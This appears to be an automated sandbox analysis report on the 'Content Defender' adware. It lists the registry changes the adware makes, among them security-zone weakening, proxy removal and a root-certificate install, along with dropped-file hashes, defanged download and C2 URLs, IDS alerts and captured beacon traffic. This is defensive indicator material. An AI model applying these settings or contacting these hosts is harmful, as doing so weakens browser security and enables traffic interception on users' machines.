[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\BagMRU]
"MRUListEx" = "00 00 00 00 01 00 00 00 03 00 00 00 02 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\ContentDefender]
"CampaignID" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\System\CurrentControlSet\Services\contentdefenderdrv]
"Tag" = "8"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ContentDefender]
"DisplayIcon" = "%Program Files%\Content Defender\ConDefSetup.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ContentDefender]
"DisplayName" = "Content Defender"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\BagMRU\0]
"MRUListEx" = "02 00 00 00 00 00 00 00 01 00 00 00 FF FF FF FF"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\ContentDefender]
"SourceId" = "106"
"ff" = "yes"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "08 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ContentDefender]
"UninstallString" = "%Program Files%\Content Defender\ConDefSetup.exe uninst=1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\BagMRU]
"NodeSlots" = "02 02 02 02 02 02 02 02 02 02 02"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F6 29 C1 07 AF 46 FF A1 B6 AC DF 76 78 D0 30 FF"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached]
"{E88DCCE0-B7B3-11D1-A9F0-00AA0060FA31} {000214E6-0000-0000-C000-000000000046} 0x401" = "01 00 00 00 7C 6C 9C 7C 68 52 1E AE 08 20 D1 01"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\ContentDefender]
"SiteID" = "200075929"
"UserId" = "4D2824E8-2A97-42EC-8E29-3AE524835690"
The Adware modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Adware modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Adware modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Adware deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process ContentDefender.exe:304 makes changes in the system registry.
The Adware creates and/or sets the following values in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\LocalService\Local Settings\Application Data"
[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\ContentDefender]
"Installed" = "1"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"
[HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\872BBD8A4C1F07B571AABC56B82BE644C0CE781B]
"Blob" = "03 00 00 00 01 00 00 00 14 00 00 00 87 2B BD 8A"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\ContentDefender]
"ff" = "yes"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "16 8D 42 83 E5 25 B5 5B 92 4C 21 55 6D 3E 84 BF"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKU\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ParseAutoexec" = "1"
The Adware modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Adware modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Adware modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Adware deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"ProxyServer"
[HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates]
"872BBD8A4C1F07B571AABC56B82BE644C0CE781B"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process ContentDefender.exe:1392 makes changes in the system registry.
The Adware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F4 34 6A DA C1 DE 42 08 2D 3B 38 B2 F0 19 10 CC"
[HKCR\TypeLib\{CCA2A357-CCB4-41C9-B6F5-4F202B8CDC82}\1.0]
"(Default)" = "ContentDefenderLib"
[HKCR\Interface\{B28F9114-243E-4046-B173-11825352D18A}\TypeLib]
"Version" = "1.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCR\CLSID\{9B7395C3-28B5-445E-AA7D-539B63514CAB}\Version]
"(Default)" = "1.0"
[HKCR\TypeLib\{CCA2A357-CCB4-41C9-B6F5-4F202B8CDC82}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\Interface\{B28F9114-243E-4046-B173-11825352D18A}\TypeLib]
"(Default)" = "{CCA2A357-CCB4-41C9-B6F5-4F202B8CDC82}"
[HKCR\TypeLib\{CCA2A357-CCB4-41C9-B6F5-4F202B8CDC82}\1.0\0\win32]
"(Default)" = "%Program Files%\Content Defender\ContentDefender.exe"
[HKCR\AppID\{3E0DB45B-9FCC-4064-B48C-080BD03A99A4}]
"LocalService" = "ContentDefender"
[HKCR\Interface\{B28F9114-243E-4046-B173-11825352D18A}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\TypeLib\{CCA2A357-CCB4-41C9-B6F5-4F202B8CDC82}\1.0\HELPDIR]
"(Default)" = "%Program Files%\Content Defender"
[HKCR\CLSID\{9B7395C3-28B5-445E-AA7D-539B63514CAB}\TypeLib]
"(Default)" = "{CCA2A357-CCB4-41C9-B6F5-4F202B8CDC82}"
[HKCR\CLSID\{9B7395C3-28B5-445E-AA7D-539B63514CAB}\LocalServer32]
"(Default)" = "%Program Files%\Content Defender\ContentDefender.exe"
[HKCR\Interface\{B28F9114-243E-4046-B173-11825352D18A}]
"(Default)" = "IDefenderControl"
[HKCR\CLSID\{9B7395C3-28B5-445E-AA7D-539B63514CAB}\LocalServer32]
"ServerExecutable" = "%Program Files%\Content Defender\ContentDefender.exe"
[HKCR\Interface\{B28F9114-243E-4046-B173-11825352D18A}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{9B7395C3-28B5-445E-AA7D-539B63514CAB}]
"(Default)" = "DefenderControl Class"
The Adware deletes the following value(s) in system registry:
[HKCR\AppID\{3E0DB45B-9FCC-4064-B48C-080BD03A99A4}]
"LocalService"
Dropped PE files
MD5 | File path |
---|---|
2d2b886aa64ea0bd7fb7bfcdf50e7602 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\tdi__amd64.sys |
cab018241a2575f91c6d48eb5f189f3a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\tdi__i386.sys |
4282a16ddc26a6390fe55baf8173b3cb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows7_amd64.sys |
72ad5948f532676ce3c21e4330d710b2 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows7_i386.sys |
c3aaab27d8571651822ec3cd57562630 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows8_amd64.sys |
52136696bf08070340963ee1d20727d8 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows8_i386.sys |
052269d5bb6dbd9b8ad8d75c0e9b0f62 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ContentDefender.exe |
9e50a76742be9dde2579021650019084 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ContentDefenderControl.exe |
765dbacb7d0fe5486fb98f1f5196fafd | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ContentDefenderPS.dll |
03b114e3c163414432deb0fe7f2233c9 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\condefclean.exe |
8cd7606e4b056f078a8b246ae03e0451 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\import_root_cert.exe |
3c5dead4b34b150670ba44470ff7801a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\libeay32.dll |
41c44403c8f52e3ed860f9e66e118b44 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nfregdrv.exe |
4236e75e1374cf4c0a37e7007cee1e95 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\certutil.exe |
697926c7cca705ae2a2b0cfc4af892ec | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\mozcrt19.dll |
010ded1caecbe2d7e331f2d78ab106a8 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\nspr4.dll |
c2fc776959b7142b099401fa246cdbd3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\nss3.dll |
432d005430c892c7edc4ab39b52b01b0 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\plc4.dll |
f4c3ef050c3e561d1f7ad264e0293b59 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\plds4.dll |
71ee80a71ead3f1345fd4c892a33cf2a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\smime3.dll |
07358d0a1228fab095ebfc001627039f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\softokn3.dll |
a41e0983666dd76383d53fa675514aec | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ssleay32.dll |
ba048d8785e79090cf8052a596307098 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ContentDefender.exe |
dd0641beac91ffad0ac1558ea127bcf7 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ContentDefenderControl.exe |
a27a25436db3d6cd0993da8aeb46410f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ContentDefenderPS.dll |
e91e54ba1585fdaf816644aaf0c285d3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\condefclean.exe |
2725a5d5f98fa820b0d72dfd7d171074 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\import_root_cert.exe |
2c1ab0b347307f39cfa1b31d1dc8303f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\libeay32.dll |
0bdedb5daee52a8a76babc19b01e47c6 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nfregdrv.exe |
7c44f3d7739b109f7ae283dbfeca0fdc | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\certutil.exe |
cbd1324f9397791f0a470efc41fb6715 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\mozcrt19.dll |
534ed18c3cd9bad9716a8c86c19fcc46 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\nspr4.dll |
882d38fcba20139ff0f715f3e40cfec3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\nss3.dll |
41d203336ac12dac1a2ade5356ae95f3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\plc4.dll |
2b08773ef387abdd5909d1ec22f2911e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\plds4.dll |
ceb5d01dbe3a5bb6738939c29991f79c | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\smime3.dll |
8852a3296fe3b486904320ed16bde386 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\softokn3.dll |
e3596777253102659c35e08e52725a32 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ssleay32.dll |
ca9679507a50a9be960a707a11dbd5d9 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\{B979352F-852D-4B26-8E59-8A238895D5EA}\ConDefSetup1211v2.exe |
ca9679507a50a9be960a707a11dbd5d9 | c:\Program Files\Content Defender\ConDefSetup.exe |
052269d5bb6dbd9b8ad8d75c0e9b0f62 | c:\Program Files\Content Defender\ContentDefender.exe |
9e50a76742be9dde2579021650019084 | c:\Program Files\Content Defender\ContentDefenderControl.exe |
765dbacb7d0fe5486fb98f1f5196fafd | c:\Program Files\Content Defender\ContentDefenderPS.dll |
03b114e3c163414432deb0fe7f2233c9 | c:\Program Files\Content Defender\condefclean.exe |
8cd7606e4b056f078a8b246ae03e0451 | c:\Program Files\Content Defender\import_root_cert.exe |
3c5dead4b34b150670ba44470ff7801a | c:\Program Files\Content Defender\libeay32.dll |
41c44403c8f52e3ed860f9e66e118b44 | c:\Program Files\Content Defender\nfregdrv.exe |
4236e75e1374cf4c0a37e7007cee1e95 | c:\Program Files\Content Defender\nss\certutil.exe |
697926c7cca705ae2a2b0cfc4af892ec | c:\Program Files\Content Defender\nss\mozcrt19.dll |
010ded1caecbe2d7e331f2d78ab106a8 | c:\Program Files\Content Defender\nss\nspr4.dll |
c2fc776959b7142b099401fa246cdbd3 | c:\Program Files\Content Defender\nss\nss3.dll |
432d005430c892c7edc4ab39b52b01b0 | c:\Program Files\Content Defender\nss\plc4.dll |
f4c3ef050c3e561d1f7ad264e0293b59 | c:\Program Files\Content Defender\nss\plds4.dll |
71ee80a71ead3f1345fd4c892a33cf2a | c:\Program Files\Content Defender\nss\smime3.dll |
07358d0a1228fab095ebfc001627039f | c:\Program Files\Content Defender\nss\softokn3.dll |
a41e0983666dd76383d53fa675514aec | c:\Program Files\Content Defender\ssleay32.dll |
cab018241a2575f91c6d48eb5f189f3a | c:\WINDOWS\system32\drivers\contentdefenderdrv.sys |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
UPX0 | 4096 | 3395584 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
UPX1 | 3399680 | 1908736 | 1908736 | 5.468 | 6f10f41ac3b80d467aa8d2230bf7ab44 |
.rsrc | 5308416 | 8192 | 7680 | 2.88655 | a38843a06b17693ea7857f20bc0151bc |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 156
16f6de22483f6edc9c620f12b6575da3
bfab27a957699bbbf3b44275ad5f0a39
d49841b55a3f2e31b77c9acdf0301d4f
502d30e7b123413879a7a90324dcf070
a3619560506930df73b2c62952fa6014
78836ba5c132e44a95b5438b514cf298
6fe3e3687f34f639e8e52556258e19e5
b05a59dad06f5f95c976814b384330f8
953affd912f81dc942491cc2a59ac7d5
3c811f4901b4f49d4963c407d485609c
5e8d98d3c9fd3e64a115b75e0d108939
ed27424c41fe1bebfd23205e2b2d318e
782e69339972f72524102fb2b0978137
32d1af350135b9f8001e11df739407fb
3196c1a1b8f2cab3060a4a724769e208
b119fb9744608c9f4f9affca2137973e
9db3fbb92e7074773d3ebc7fb8322b48
faacb45b2db80aaed011f3fe88011fbe
8b4c7670cfdf9f990abf727c61a18448
5bf060db16f9d3b4ec573393d8ad5086
c74eff9e39ff7873a7d7c5f8bbda8a49
eb320a2e7769043f453eff8bf1a9d50c
fa9778bbd558263b414e27950882113c
8783632344f8bbaf74306dcde473b671
dc3099f12e469a91633b7fd3cfefea7d
5d25f06eb8c2264c3dd47cd2dacc56ee
URLs
URL | IP |
---|---|
hxxp://cdn01.woktho.ru/api | ![]() |
hxxp://cdn01.woktho.ru/installs/1407/276d2f1f.exe | ![]() |
hxxp://contentdefender-cis1.org/install/start/sourceid/106/campaignid/1/userid/4D2824E8-2A97-42EC-8E29-3AE524835690/siteid/200075929/version/115 | ![]() |
hxxp://contentdefender-cis1.org/install/finish/result/ok/sourceid/106/campaignid/1/userid/4D2824E8-2A97-42EC-8E29-3AE524835690/siteid/200075929/version/115 | ![]() |
hxxp://contentdefender-cis1.org/data/get/sourceid/106/campaignid/1/userid/4D2824E8-2A97-42EC-8E29-3AE524835690/siteid/200075929/version/115 | ![]() |
hxxp://cdn01.woktho.ru/installs/1563/dfedee1c.exe | ![]() |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY Http Client Body contains pw= in cleartext
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
Traffic
POST /api HTTP/1.0
Connection: keep-alive
Content-Length: 158
Host: cdn01.woktho.ru
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)
....x.-.
.@..e...&.t.6..@QQ
"...x.o.0.f.
..E@..g.%.&....T.Lj.;=..0......C.[.m..u...js..t.s..$@.. !.=x.W$..*.:..J.'.q...d.0..._......Lp.:[.%....=7...>__.5H
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Mon, 16 Nov 2015 00:49:41 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.177...x......0...^.....)G>Wg.:........<f...C.O..j`..U%....O..}?.c.
...
POST /api HTTP/1.0
Connection: keep-alive
Content-Length: 850
Host: cdn01.woktho.ru
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)
....x.}Tmo.8. .?uXlH.,....W.^z..^W`.....]..')N...}...0......H.!E.sZ....Z5e..d.T.7...F..P....._.O.d..d..(p......P.:@...9..*..A.."iJ..........p$M.......YUr^....Y.<.....#|O......v@.2.,..6s<Ai4.Q..(>...{i<...2B..W....? Y.K.J..v.....#..9......=.........|...................*....{....v.O6o.Wt
*hO....T.j..P. y....2x.4..q...:I.y...<...-.......g..vo.E.rP.}.......4.;......5~:iS..>,.[N. ~'...NX..3.Y .......tp......`....q.G7y.U....q.|.\..'.[.0. ..ht'...\...9.m.....m..~...2Z....(....L..E..........vr.G.........ld.D.{...Y.&'yqw......d.........8*..=. .^*.....pn....O..k...\}.Hp.j4T....C......Z..
Z.M.....]..l....$..|..E....5)....!.% w.ym...../..1.......{..g=(./| r......`................v....0J...:o:9..).Yw0.#.Y.dB".p.....WlG.t.
.....a....//.{.[.0.y...=...aS.....m..2.Y.j.....LY#(.u#"J..xY.Hi....w.NEg...K^_.x.....j....-.&.B..K......]....1.u.7- .c"y......
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Mon, 16 Nov 2015 00:48:59 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.17Q...x..XYo.8.. ..&....A]n...I.l.I..}X..-Q..Y.(*.[...P.c.Hj...P$...3...
..F`.=3.}klG....Z...82]........w.r.......J#..%....c/..rid..a...=....!.
c.K..Mdx.)....4/..2...0!.....MiA&..!...f..E.wq7.r.....HX.W...(qW..].s#
6....@N.[.E....)I.....q.f4'S)....h<..*L.4o..8f<..2a.. D.r.!&YI.
...l.Cm..`d......L.....T.k.......a].b..5*x.F...%Y.......h..FX..S.W..l9
"..-9.F=F.........oQ..O......yD.............kX..0GQ.Q..[F.K.%..}..4.:a
.C...a|....i9b..*..`Y..;..fX?].o.........\.=e_.^QT..5.(>.w....@.._.
.9...O..p2]..>e...Z...F}.0....@... .$.MS Y.9*.....^e....|........I%
.r.=y2.a%e...X............g.S.I^fD0yD...g..d.o.ZK..Nn..1.o.~..........
s..4[d..B,.D;.........).=..v...'....... @ ....t.....)....@.l....W.@...
.p..E.rV.../i..Y.b .A.g..P.0...r1~C.["TkWMYS.E.S..Z....V.:.z.Y...].Y.k
n.s..k:- l......v....L .....`.d..e..w.pY......U.....,.....&.......e.kV
.md8/..".....=e.t...%..i5}B...'M.]........}..D@..=Y.M.......0....(....
Oa$c.!.TH...".z..z.Z.E......8._~. ...%..$.y^.....-(..\..|o..X.wG...R..
.N3.6.... ........V......`.u...Z..........p;..].........WR.p.t6.=0'A..
).@......H.%.m3@.. 9..Gdk.>\..x.Q.m....f..P!.)..S.......-....)'..2.
)%..cN.aUC...e.k9O..._..V.w.B...k...<...$w.ShO......).........[:L..
=z....:...:./..X......v.L.7..Y.dK.?'eA.. .]h......`......Z..B...N.....
....W....>vE...|...fb.........A.y..4./xzK.....l.l.......U...B..].47
[5P.. .s%n~]........2l..R\U....E.?...J....5.......DA..g...]|4.(.....{h
M..Y...jj..m-.R..m....m..V....P.a1&y...t.@>..9..P....zS....8..w.?9.
.!O.Q.7.jDt....J...~..U...k.....2l.9.o...Qm.<@....h.......#.&..<<< skipped >>>
POST /install/finish/result/ok/sourceid/106/campaignid/1/userid/4D2824E8-2A97-42EC-8E29-3AE524835690/siteid/200075929/version/115 HTTP/1.1
Accept: text/*
Content-Type: application/x-www-form-urlencoded; charset=utf8
User-Agent: ContentDefender
Host: contentdefender-cis1.org
Content-Length: 1676
Cache-Control: no-cache
